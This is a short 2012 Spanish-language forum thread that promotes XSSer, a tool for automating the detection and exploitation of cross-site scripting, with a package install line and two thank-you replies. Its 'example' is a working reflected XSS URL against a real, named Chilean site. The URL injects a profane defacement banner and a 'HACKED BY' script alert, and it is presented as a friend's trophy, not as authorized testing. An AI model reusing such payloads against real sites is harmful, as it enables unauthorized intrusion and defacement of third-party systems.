Underc0de

[In]Seguridad Informática => Bugs y Exploits => Topic started by: xc0d3 on June 01, 2012, 11:20:48 am

Title: XSSer: automatic tool for pentesting XSS attacks
Post by: xc0d3 on June 01, 2012, 11:20:48 am

XSSer es una  herramienta de prueba  que automatiza el proceso de detección y explotación de inyecciones XSS contra diferentes aplicaciones.

XSS Es un tipo de inseguridad informática típico de las aplicaciones Web,
que permite a una tercera parte inyectar código JavaScript en páginas web vistas por el usuario.

Instalacion

apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip en bt ya esta instalada





EJEMPLO

xss descubierto por mi amigo Crackx

http://www.senadorvirtual.cl/dgeneral.php?ideleg&idusuario=%22%3E%3Ch1%3EFUCK+POLITICOS+KULIAOS+0wn3d+Team%3C%2Fh1%3E%3Cscript%3Ealert%28%22HACKED+BY+Crackx+FUCK+POLITICOS%22%29%3C%2Fscript%3E


mas Info ->http://xsser.sourceforge.net/

 
Title: Re:xsser
Post by: arthusu on June 01, 2012, 11:52:59 am
Gracias por el programa el otra ves lo mire ahora vere como usarlo ;) :D
Title: Re:XSSer: automatic tool for pentesting XSS attacks
Post by: Aryenal.Bt on June 25, 2012, 04:47:49 am
Gracias por tu aporte.